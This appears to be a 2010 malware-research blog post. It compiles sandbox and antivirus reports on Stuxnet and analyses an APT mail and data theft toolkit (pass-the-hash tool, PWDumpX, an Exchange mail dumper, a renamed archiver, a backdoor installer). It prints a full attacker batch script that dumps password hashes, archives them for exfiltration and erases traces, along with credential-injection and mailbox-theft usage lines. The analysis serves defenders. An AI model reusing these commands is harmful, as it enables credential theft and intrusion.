%Windir%\inf\oem7A.PNF 498,176 bytes MD5: 0xAD19FBAA55E8AD585A97BBCDDCDE59D4 SHA-1: 0xBCFCC25C6D0F58D784D5B5A4C631E920F655F50E (not available) 5 %System%\drivers\mrxcls.sys 26,616 bytes MD5: 0xF8153747BAE8B4AE48837EE17172151E SHA-1: 0xCB0793029C60C0BD059FF85DE956619F7FDEB4FD Trojan:WinNT/Stuxnet.A [Microsoft] 6 %System%\drivers\mrxnet.sys 17,400 bytes MD5: 0xCC1DB5360109DE3B857654297D262CA1 SHA-1: 0x758240613C362BB1FD13E07D3D19F357B7F8A6DA Trojan:WinNT/Stuxnet.B [Microsoft] 7 [file and pathname of the sample #1] 517,632 bytes MD5: 0x74DDC49A7C121A61B8D06C03F92D0C13 SHA-1: 0x0CCBC128DD8BF73DC7B3922FB67D26BBCDBCAA89 Trojan.Gen [PCTools] Trojan.Gen [Symantec] TrojanDropper:Win32/Stuxnet.A [Microsoft] Notes: %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows or C:\Winnt. %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP). Memory Modifications There were new memory pages created in the address space of the system process(es): Process Name Process Filename Allocated Size svchost.exe %System%\svchost.exe 499,712 bytes svchost.exe %System%\svchost.exe 499,712 bytes lsass.exe %System%\lsass.exe 499,712 bytes lsass.exe %System%\lsass.exe 499,712 bytes The following modules were loaded into the address space of other process(es): Module Name Module Filename Address Space Details KERNEL32.DLL.ASLR.000246c0 %System%\KERNEL32.DLL.ASLR.000246c0 Process name: services.exe Process filename: %System%\services.exe Address space: 0xE50000 - 0xF88000 KERNEL32.DLL.ASLR.000245d2 %System%\KERNEL32.DLL.ASLR.000245d2 Process name: svchost.exe Process filename: %System%\svchost.exe Address space: 0x9D0000 - 0xB08000 KERNEL32.DLL.ASLR.0002454e %System%\KERNEL32.DLL.ASLR.0002454e Process name: svchost.exe Process filename: %System%\svchost.exe Address space: 0x2490000 - 0x25C8000 Registry Modifications The following Registry Keys were created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MRxCls HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MRxCls\Enum HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MRxNet HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MRxNet\Enum HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls\Enum HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet\Enum The newly created Registry Values are: [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control] *NewlyCreated* = 0x00000000 ActiveService = "MRxCls" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000] Service = "MRxCls" Legacy = 0x00000001 ConfigFlags = 0x00000000 Class = "LegacyDriver" ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}" DeviceDesc = "MRXCLS" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS] NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control] *NewlyCreated* = 0x00000000 ActiveService = "MRxNet" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000] Service = "MRxNet" Legacy = 0x00000001 ConfigFlags = 0x00000000 Class = "LegacyDriver" ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}" DeviceDesc = "MRXNET" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET] NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MRxCls\Enum] 0 = "Root\LEGACY_MRXCLS\0000" Count = 0x00000001 NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MRxCls] Description = "MRXCLS" DisplayName = "MRXCLS" ErrorControl = 0x00000000 Group = "Network" ImagePath = "%System%\Drivers\mrxcls.sys" Start = 0x00000001 Type = 0x00000001 Data = 8F 1F F7 6D 7D B1 C9 09 9D CC 24 7A C6 9F FB 23 90 BD 9D BF F1 D4 51 92 2A B4 1F 6A 2E A6 4F B3 CB 69 7C 0B 92 3B 1B C0 D7 75 17 A9 E3 33 48 DC AD F6 DA EA 2F 87 10 C4 21 81 A5 75 68 00 2E B1 C2 7B EB DD BB 72 47 DC 87 91 14 A5 F3 C4 32 B0 CC 93 38 3 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MRxNet\Enum] 0 = "Root\LEGACY_MRXNET\0000" Count = 0x00000001 NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MRxNet] Description = "MRXNET" DisplayName = "MRXNET" ErrorControl = 0x00000000 Group = "Network" ImagePath = "%System%\Drivers\mrxnet.sys" Start = 0x00000001 Type = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control] *NewlyCreated* = 0x00000000 ActiveService = "MRxCls" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000] Service = "MRxCls" Legacy = 0x00000001 ConfigFlags = 0x00000000 Class = "LegacyDriver" ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}" DeviceDesc = "MRXCLS" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS] NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control] *NewlyCreated* = 0x00000000 ActiveService = "MRxNet" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000] Service = "MRxNet" Legacy = 0x00000001 ConfigFlags = 0x00000000 Class = "LegacyDriver" ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}" DeviceDesc = "MRXNET" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET] NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls\Enum] 0 = "Root\LEGACY_MRXCLS\0000" Count = 0x00000001 NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls] Description = "MRXCLS" DisplayName = "MRXCLS" ErrorControl = 0x00000000 Group = "Network" ImagePath = "%System%\Drivers\mrxcls.sys" Start = 0x00000001 Type = 0x00000001 Data = 8F 1F F7 6D 7D B1 C9 09 9D CC 24 7A C6 9F FB 23 90 BD 9D BF F1 D4 51 92 2A B4 1F 6A 2E A6 4F B3 CB 69 7C 0B 92 3B 1B C0 D7 75 17 A9 E3 33 48 DC AD F6 DA EA 2F 87 10 C4 21 81 A5 75 68 00 2E B1 C2 7B EB DD BB 72 47 DC 87 91 14 A5 F3 C4 32 B0 CC 93 38 3 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet\Enum] 0 = "Root\LEGACY_MRXNET\0000" Count = 0x00000001 NextInstance = 0x00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet] Description = "MRXNET" DisplayName = "MRXNET" ErrorControl = 0x00000000 Group = "Network" ImagePath = "%System%\Drivers\mrxnet.sys" Start = 0x00000001 Type = 0x00000001
 From Threatexpert
  * The following files were created in the system:
#    Filename(s)    File Size    File Hash    Alias
1     %Windir%\inf\mdmcpq3.PNF     6,623 bytes     
MD5: 0x0DD2AF5AFE93118073CB656D813435A4
SHA-1: 0x256AC5228427FCD03FB9EC1871B15FD76E4D0879     (not available)

2     %Windir%\inf\mdmeric3.PNF     90 bytes    
MD5: 0xB834EBEB777EA07FB6AAB6BF35CDF07F
SHA-1: 0xF7B86531AD78EB283E59091A1C64B0C47D50E6C6     (not available)

3     %Windir%\inf\oem6C.PNF     323,848 bytes    
MD5: 0xFA4381DF1F7F89077439A596630D5647
SHA-1: 0x152B6830777E7F2B214708A21BA28F9D625E5E16     (not available)

4     %Windir%\inf\oem7A.PNF     498,176 bytes     
MD5: 0xAD19FBAA55E8AD585A97BBCDDCDE59D4
SHA-1: 0xBCFCC25C6D0F58D784D5B5A4C631E920F655F50E     (not available)

5     %System%\drivers\mrxcls.sys     26,616 bytes    
MD5: 0xF8153747BAE8B4AE48837EE17172151E
SHA-1: 0xCB0793029C60C0BD059FF85DE956619F7FDEB4FD     Trojan:WinNT/Stuxnet.A [Microsoft]

6     %System%\drivers\mrxnet.sys     17,400 bytes     
MD5: 0xCC1DB5360109DE3B857654297D262CA1
SHA-1: 0x758240613C362BB1FD13E07D3D19F357B7F8A6DA     Trojan:WinNT/Stuxnet.B [Microsoft]

7     [file and pathname of the sample #1]     517,632 bytes    
MD5: 0x74DDC49A7C121A61B8D06C03F92D0C13
SHA-1: 0x0CCBC128DD8BF73DC7B3922FB67D26BBCDBCAA89     Trojan.Gen [PCTools]
Trojan.Gen [Symantec]
TrojanDropper:Win32/Stuxnet.A [Microsoft]

Virustotal
016169ebebf1cec2aad6c7f0d0ee9026  received on 2010.07.16 11:55:58 (UTC)
http://www.virustotal.com/analisis/743e16b3ef4d39fc11c5e8ec890dcd29f034a6eca51be4f7fca6e23e60dbd7a1-1279281358
Result: 25/41 (60.98%)
a-squared     5.0.0.31     2010.07.16     Trojan-Dropper.Win32.Stuxnet!IK
AhnLab-V3     2010.07.16.00     2010.07.15     Dropper/Win32.Stuxnet
AntiVir     8.2.4.12     2010.07.16     TR/Drop.Stuxnet.D
Avast     4.8.1351.0     2010.07.16     Win32:Trojan-gen
Avast5     5.0.332.0     2010.07.16     Win32:Trojan-gen
AVG     9.0.0.836     2010.07.16     SHeur3.XLI
BitDefender     7.2     2010.07.16     Win32.Worm.Stuxnet.A
Comodo     5446     2010.07.16     TrojWare.Win32.Rootkit.Stuxnet.a
DrWeb     5.0.2.03300     2010.07.16     Trojan.Stuxnet.1
F-Secure     9.0.15370.0     2010.07.16     Trojan.Agent.AQCK
GData     21     2010.07.16     Win32.Worm.Stuxnet.A
Ikarus     T3.1.1.84.0     2010.07.16     Trojan-Dropper.Win32.Stuxnet
Kaspersky     7.0.0.125     2010.07.16     Trojan-Dropper.Win32.Stuxnet.d
McAfee     5.400.0.1158     2010.07.16     Stuxnet
McAfee-GW-Edition     2010.1     2010.07.16     Heuristic.LooksLike.Win32.NewMalware.B
Microsoft     1.6004     2010.07.16     TrojanDropper:Win32/Stuxnet.A
NOD32     5283     2010.07.16     Win32/Stuxnet.A
nProtect     2010-07-16.01     2010.07.16     Trojan.Agent.AQCK
PCTools     7.0.3.5     2010.07.16     Rootkit.Stuxnet
Prevx     3.0     2010.07.16     Medium Risk Malware
Sophos     4.55.0     2010.07.16     Troj/Stuxnet-A
Sunbelt     6591     2010.07.16     Trojan.Win32.Generic!BT
Symantec     20101.1.1.7     2010.07.16     Trojan.Gen
VBA32     3.12.12.6     2010.07.16     Trojan-Spy.0485
VirusBuster     5.0.27.0     2010.07.16     Trojan.DR.Stuxnet.C
Additional information
File size: 517632 bytes
MD5   : 74ddc49a7c121a61b8d06c03f92d0c13



 Microsoft Malware Protection Center

Trojan:WinNT/Stuxnet.A
Aliases
      Win32/PcClient.ACH (CA)


Alert Level (?) Severe
Released: Jul 07, 2010
Summary
Trojan:WinNT/Stuxnet.A is a trojan component installed by TrojanDropper:Win32/Stuxnet.A that injects code into the running process LSASS.EXE.

Symptoms
System changes
The following system changes may indicate the presence of this malware:

    *
      The presence of the following files:
      \mrxcls.sys
    *
      The presence of the following registry keys:
      HKLM\SYSTEM\CurrentControlSet\Services\MRxCls

Technical Information (Analysis)
Trojan:WinNT/Stuxnet.A is a trojan component installed by TrojanDropper:Win32/Stuxnet.A that injects code into the running process LSASS.EXE.
Installation
Trojan:WinNT/Stuxnet.A may be present as the following file:

\Drivers\mrxcls.sys

Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.

The trojan component runs as a hidden service named "MRXCLS" via a registry modification as in the following example:

Sets value: "Description"
With data: "MRXCLS"
Sets value: "DisplayName"
With data: "MRXCLS"
Sets value: "ErrorControl"
With data: "0"
Sets value: "Group"
With data: "Network"
Sets value: "ImagePath"
With data: "\??\%windir%\system32\Drivers\mrxcls.sys"
Sets value: "Start"
With data: "1"
Sets value: "Type"
With data: "1"
Sets value: "Data"
With data: ""
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\MRxCls
Payload
Injects code
Trojan:WinNT/Stuxnet.A is capable of injecting malicious code into the running process "LSASS.EXE" based on data written in the registry or from other TrojanDropper:Win32/Stuxnet.A components such as the following:

%windir%\inf\mdmcpq3.pnf
%windir%\inf\mdmeric3.pnf
%windir%\inf\oem6c.pnf
%windir%\inf\oem7a.pnf

Analysis by Francis Allan Tan Seng 

APT malware #2. Anatomy of a mail / data theft attack. (wiam.exe and others)

These days I see a spike in the number of searches for WIAM.EXE, which is listed as one of the file available for download upon request. I thought I would add a few more details on this file and files associated with it.

While there can be any kind of file named wiam.exe, chances are that your file is similar or identical to the one described below. This file is part malware kind frequently referred to as APT malware. If you find this file on a system, look for others listed below. And yes, as you already guessed, you have a Problem.

According to Mandiant 

"The Advanced Persistent Threat (APT) is a sophisticated and organized cyber attack to access and steal information from compromised computers. The intruders responsible for the APT attacks target the Defense Industrial Base (DIB), financial industry, manufacturing industry, and research industry. The attacks used by the APT intruders are not very different from any other intruder. The main differentiator is the APT intruder’s perseverance and resources. They have malicious code (malware) that circumvents common safeguards such as anti-virus and they tend to generate more activity than wanton “drive by hacks” on the Internet. The intruders also escalate their tools and techniques as a victim firm’s capability to respond improves. Therefore, the APT attacks present different challenges than addressing common computer security breaches."

Download all malware files mentioned below as a password protected archive (contact me if you need the password)
Download additional files mentioned in the update July 16, 2010

 Update: scroll down to see recent additions marked  Update July 16, 2010
 

1. wiam.exe + iam.dll  

The file itself is not really a trojan but a cli tool, part of the modified pass-the-hash toolkit (PSH toolkit) released by Core Technologies.

"The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!)" See Modifying Windows NT Logon Credential

PSH original toolkit files

File: iam.exe  Size: 90112 MD5:  1FF020D6F41CBF73ADF3AF2DE9A08CFD

File: iamdll.dll  Size: 49152  MD5:  DAB43935D17725024CC5EF2DD35CBEDD

http://www.virustotal.com/analisis/8f1f0eb6927d8eb331b36f2f5d0c7b434e2473332dea4acde1d6e96fd758731a-1275930386
 File iam.exe received on 2010.06.07 17:06:26 (UTC)
Result: 5/41 (12.2%)
Authentium    5.2.0.5    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Prot    4.6.0.103    2010.06.07    W32/Heuristic-KPP!Eldorado
Panda    10.0.2.7    2010.06.06    Suspicious file
PCTools    7.0.3.5    2010.06.07    Hacktool.PTHToolkit
Symantec    20101.1.0.89    2010.06.07    Hacktool.PTHToolkit
File size: 90112 bytes
MD5...: 1ff020d6f41cbf73adf3af2de9a08cfd

File iamdll.dll received on 2010.06.07 17:26:26 (UTC)
http://www.virustotal.com/analisis/16f480fcb042e07d89f2a384b52bfce9716c114b374bc8f81a95386651585b65-1275931586
Result: 0/41 (0%)
Additional information
File size: 49152 bytes
MD5...: dab43935d17725024cc5ef2dd35cbedd


=============================
Modified kit
File: wiam.exe  Size: 40960  MD5:  F49CB9A7006FB34E5B5A81AE32358C77
File: iam.dll   Size: 36864  MD5:  30D50F856EFE9BCF7D0A859154CB2F92


http://www.virustotal.com/analisis/bc1c5911eb56fd92bb36507e694ee0629cf114c4ba2729c49b1cd3973e44c125-1275930460
 File wiam.exe received on 2010.06.07 17:07:40 (UTC)
Result: 22/41 (53.66%) 
a-squared    5.0.0.26    2010.06.07    Trojan.Hijacker!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Malware/Win32.Trojan Horse
AntiVir    8.2.2.6    2010.06.07    TR/Hijacker.Gen
Authentium    5.2.0.5    2010.06.07    W32/Heuristic-KPP!Eldorado
Avast    4.8.1351.0    2010.06.07    Win32:Trojan-gen
Avast5    5.0.332.0    2010.06.07    Win32:Trojan-gen
BitDefender    7.2    2010.06.07    Application.Generic.248976
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5019    2010.06.07    UnclassifiedMalware
eSafe    7.0.17.0    2010.06.06    Win32.TRHijacker
F-Prot    4.6.0.103    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Secure    9.0.15370.0    2010.06.07    Application.Generic.248976
GData    21    2010.06.07    Application.Generic.248976
Ikarus    T3.1.1.84.0    2010.06.07    Trojan.Hijacker
McAfee    5.400.0.1158    2010.06.07    Generic.dx!mfu
McAfee-GW-Edition    2010.1    2010.06.07    Generic.dx!mfu
NOD32    5180    2010.06.07    probably a variant of Win32/Agent
Panda    10.0.2.7    2010.06.06    Trj/CI.A
PCTools    7.0.3.5    2010.06.07    Trojan.Generic
Sunbelt    6416    2010.06.07    Trojan.Win32.Generic!BT
Symantec    20101.1.0.89    2010.06.07    Trojan Horse
VirusBuster    5.0.27.0    2010.06.07    Trojan.Hijacker.BUO
Additional information
File size: 40960 bytes
MD5...: f49cb9a7006fb34e5b5a81ae32358c77

File iam.dll received on 2010.06.07 17:22:42 (UTC)
Result: 0/41 (0%)
Additional information
File size: 36864 bytes
MD5...: 30d50f856efe9bcf7d0a859154cb2f92

 You can compare them in a hex editor, the files are not identical but here are similarities in the strings.

iam.exe file from Core
File: iam.exe (file from Core PSH toolkit) MD5: 1ff020d6f41cbf73adf3af2de9a08cfd Size: 90112 Ascii Strings (partial): -------------------------------------------------------------------------- ..... Error in cmdline!. Bye!. Error in cmdline!. Credentials format is wrong! too many ':' characters! Error in cmdline!. Credentials format is wrong! too few ':' characters! username is too long!. username wrong format!. domain is too long!. domain wrong format!. lmhash is too long!. lmhash wrong format!. nthash is too long!. nthash wrong format!. SeDebugPrivilege IAM v1.3 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies This tool changes the current session NTLM credentials. options: username:domainname:LMhash:NThash this help. optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter. IAM.EXE will try to locate some memory locations instead of using hard-coded values. enable debug info. Examples: iam.exe -h administrator:mydomain:0102030405060708090A0B0C0D0E0F10:0102030405060708090A0B0C0D0E0F10 iam.exe -b -h administrator:mydomain:0102030405060708090A0B0C0D0E0F10:0102030405060708090A0B0C0D0E0F10 .\iamdll.dll Error: iamdll.dll is not in the current directory!. -DbBh:H You didn't supply credentials! Parameters: Username: %s Domainname: %s LM hash: %.2X NT hash: %.2X Cannot Obtain Windows Directory!. %s\system32\lsasrv.dll LSASRV.DLL Location: %s Cannot get LSASRV.DLL Version Size Info. Cannot allocate buffer to get LSASRV.DLL Info. Cannot get LSASRV.DLL VersionInfo!. Cannot obtain version info from info block!. LSASRV.DLL version: %.8Xh.%8Xh Checking LSASRV.DLL.... Unknown LSASRV.DLL. skipped. (-B was specified). Trying to obtain addresses... Failed! (AC = %.8X, EM = %.8X) Failed! (the address group was not correctly identified!. email the author!) Ok! (AC = %.8X, EM = %.8X) lsass.exe LOGONID: %.8xh LSASS_PID: %.8xh The current logon credentials were sucessfully changed! An error was encountered when trying to change the current logon credentials!. 1t0u.t u.t`
wiam.exe strings (partial, just for comparison) File: wiam.exe MD5: f49cb9a7006fb34e5b5a81ae32358c77 Size: 40960 Ascii Strings (partial): -------------------------------------------------------------------------- ..... Error in cmdline!. Bye!. Error in cmdline!. Credentials format is wrong! too many ':' characters! Error in cmdline!. Credentials format is wrong! too few ':' characters! username is too long!. username wrong format!. domain is too long!. domain wrong format!. lmhash is too long!. lmhash wrong format!. nthash is too long!. nthash wrong format!. Options: username:domainname:lmhash:nthash <cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe) .\iam.dll Error: iam.dll is not in the current directory!. -Dh:r: You didn't supply credentials! Could not enable debug privileges. You must run this tool with an account with administrator privileges. lsass.exe Cannot get LSASS.EXE PID! LSASS HANDLE: %x Error: Cannot open LSASS.EXE!. cannot run the specified program! Current LogonID: %.8Xh Cannot alloc pthparams!. AddCredentials iam.dll %s\%s lsass.exe Error in InjectDllAndCallFunction the credentials were successfully changed! An error occurred changing the credentials. kernel32.dll LoadLibraryA GetProcAddress FreeLibrary SeDebugPrivilege $Id: getopt.c,v 1.1 2008/02/25 17:58:26 hochoa Exp $ POSIXLY_CORRECT %s: invalid option -- %c %s: option requires an argument -- %c

The files can be found in various subdirectories of

\%userprofle%\local settings\temp
C:\windows\ime\imejp
C:\windows\system32
 C:\windows\system32\temp\

If your attackers are sloppy or if you run data recovery/unerase/unformat tools on the affected machine, you may find other tools and files associated with this type of attack.

2. DumpExt.dll, DumpSvc.exe, PWDumpX.exe

 PWDumpX v1.4 - Dumps domain password cache, LSA secrets, password hashes, and password history hashes.

I don't think these files require much analysis, they are part of a well known password stealing application and the results are needed for pass-the-hash exercises described above


3. m.exe

Update: July 16, 2010. 

You may see MAPI.EXE as a variant, which does the same thing (see download link in the beginning of this post)

VT 0/42 

File size: 227840 bytes
MD5   : c57902ace7ff4173ae41f1292ea85e2a

http://www.virustotal.com/analisis/7a85131da877ac43d85315bd736783ebc62ba41625275efc6ee1ee3a1f60f7fd-1278304255





m.exe is a file you may find together with the files listed. This file might be a standalone creation or a derivative of getmail (many thanks to JM for the tip). See the strings below for comparison.

Once user credentials are changed using the psh toolkit described above (wiam.exe+iam.dll), m.exe cli tool can be used to retrieve email messages of the target from an Exchange server. The usage is the following:

Example:%s -s:sn-server1.mailserver.com -u:exuser4 -t:2006-9-25-14 -o:c:\winnt\temp
%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

One needs to specify user name, server name, date range and location where to save the stolen data.

The email messages will be converted to text and attachments saved in corresponding subfolders. See examples below.

The message formatting will look like this:

From:Jon Doe
To:Jane Smith
Subject:RE: Meeting
Recv Time:08/05/2009 08:27 PM

Hi Jane,

Thanks so much but I will not be able to attend the meeting. 

Best,

Jon
________________________________
From: Jane Smith [mailto:JSmith@company.com]
Sent: Tuesday, August 04, 2009 10:43 AM
To: Jon Doe
Subject: Meeting

Jon, can you join us for the meeting tomorrow?

Thanks
Jane

Until very recently it was 0/41 on VT but now it is 1/41
http://www.virustotal.com/analisis/2903e1865777479f326757ce227711b149a3b893698ec0ad34e3ed0ae3761cc5-1275934263
  File m.exe received on 2010.06.07 18:11:03 (UTC)
Result: 1/41 (2.44%)
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Backdoor.H
Additional information
File size: 215552 bytes
MD5...: 09e25bb934d8523fccd27b86fbf4f8ce

m.exe strings
strings from m.exe ------------------ %s%d-mail.txt Recv Time: Subject: To: From: mail.txt %s\%d\ mail OpenMessageStore Error Login %s %s error EXMAPI INIT Error Creat Profile Error %d-%d-%d-%d MyOutlook temp Example:%s -s:sn-server1.mailserver.com -u:exuser4 -t:2006-9-25-14 -o:c:\winnt\temp %s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath #32770 .?AVexception@@ .?AVbad_cast@std@@ missing locale facet %m/%d/%Y %I:%M %p %s\Attachment.dat %s\%s


getmail.exe strings strings from getmail.exe ------------------------ SOFTWARE\Public Domain\GetMail Failed to open registry key for GetMail profile %s, using default. 1.33 GETMAIL %s PROFILE EDITOR To modify: getmail -install POP3Host loginname password [Delete [Xtract [Try [Port [Profile]]]]] To delete: getmail -profile -delete Profile Profiles are listed as in the -install option: POP3Host%cLoginName/Password%cDelete/Xtract/Try/POP3Port%cProfile <default> to set the POP3 server's address and the userid/password do: getmail -install server loginname password -profile syntax: Getmail -u <user> -pw <password> -s <server> [optional switches (see below)] Getmail -install [ see install details below ] Getmail -profile [-delete | "<default>"] [profile1] [profileN] [-q] Getmail -h [-q] Getmail -forceextract filename -install <server> <userid> <password> [<delete> [<xtract> [<try> [<port> [<profile>]]]]] : set's POP3 server, login, password, whether to delete or not (Yes/No), whether to automatically extract base64/7bit/UU encoded files or not (Yes/No), number of tries and port for profile (<delete> <xtract> <try> and <port> may be replaced by '-'). -u <userid> : Specify userid on remote pop3 host -pw <password>: Specify password for userid on remote mail host -s <server> : Specify mail server (pop3) to contact -nodelete : Do not delete messages after downloading (default) -delete : Delete messages after downloading -noxtract : Do not extract base64/7bit/UU files after downloading (default) -xtract [defname]: Extract base64/7bit/UU encoded files after downloading messages defname is an optional default filename for the extracted file -domainstamp : Prepend sender's domain name to extracted attachments -headersonly : Download only the headers of the message -port <port> : port to be used on the server, defaults to POP3 (110) -p <profile> : send with SMTP server, user and port defined in <profile>. -q : supresses *all* output. -n <n> : Only get 'n' messages -m <n> : Only get message # n -b <n> : Retrieve messages beginning from # n -plain : Extract text/plain segments too (usually ignored) -h : displays this help. -try <n times>: how many attempts to access mail. from '1' to 'INFINITE' -ti <n> : Set timeout to 'n' seconds. -forceextract fn: Attempt to extract any encoded messages in 'fn' tcp

 4.r.exe or ntfre.exe or any name

The tools get uploaded as an archive (archive be disguised as a temp file like ~WRD0204.tmp) and the stolen data needs to be compressed before it gets taken out, so there can be any kind of archiver involved These are two examples - same kind of cli WinRAR, just different names

(C) 1993-%d Alexander Roshal
beta
Usage:     rar - -
Usage:     unrar - -
               <@listfiles...>

  a             Add files to archive

 File ntfre.exe received on 2010.06.07 18:28:41 (UTC)

http://www.virustotal.com/analisis/1616612517d98e780666efd5b69b9ac5e94e34a661252198c88f0a2cf589792f-1275935321
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 1/41 (2.44%)
eSafe    7.0.17.0    2010.06.06    Win32.Banker  - not really but they use these in banks too, I am sure (M)
Additional information
File size: 332800 bytes
MD5...: c7e858e4a51ba7d26af9235064988274

  
r.exe is the same MD5 c7e858e4a51ba7d26af9235064988274

5. Batch files to automate the process.

There can be any variety of batch files, their content depends how much typing they don't want to do. Here is an example of a password hash stealing process
Here is an example for pp.bat

cd C:\windows\ime\imejp
ntfre e -p64740629 ~WRD0203.tmp (uncompress ~WRD0203.tmp archive using password 64740629)
del ~WRD0203.tmp (delete the archive)
PWDumpX.exe 127.0.0.1 + +  (dump password hash)
del DumpExt.dll
del DumpSvc.exe
del PWDumpX.exe
del 127.0.0.1-LSASecrets.txt
del 127.0.0.1-PWCache.txt
ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday  C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
del 127.0.0.1-PWHashes.txt
del ntfre.exe
net use \\127.0.0.1\ipc$ /del
del pp.bat

 ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp

  means the following:

 

-r - add files to archive with all subdirectories  

-m3 - set compression method 3 , which is default (5 is max)

-inul - means suppress messages

ep1  -- means exclude bvase dir name from names

 n* - Uhm, something about specified files not sure

-hphappyday  - set this as archive password 

 6. Backdoor services and files for their installation.

- there are MANY types of services that get modified to serve as backdoors by replacing the legitimate library. I posted a few recent examples before  and  and I will post more  but now I will give one example.

 s.exe

some strings

GetStartupInfoA
cmd /c attrib +h +s qmqrprxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 qmqrprxy.dll,RundllInstall
qmqrprxy.dll
cmd /c del.bat
del %s
del %s /as
ping 127.0.0.1 -n 3
del.bat

Update July 16, 2010 

Here is a nice recent example for a backdoor service (legitimate library file for a non-essential service gets replaced with a malicious file)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IAS]

"DisplayName"="Authentication Service"
"ObjectName"="LocalSystem"
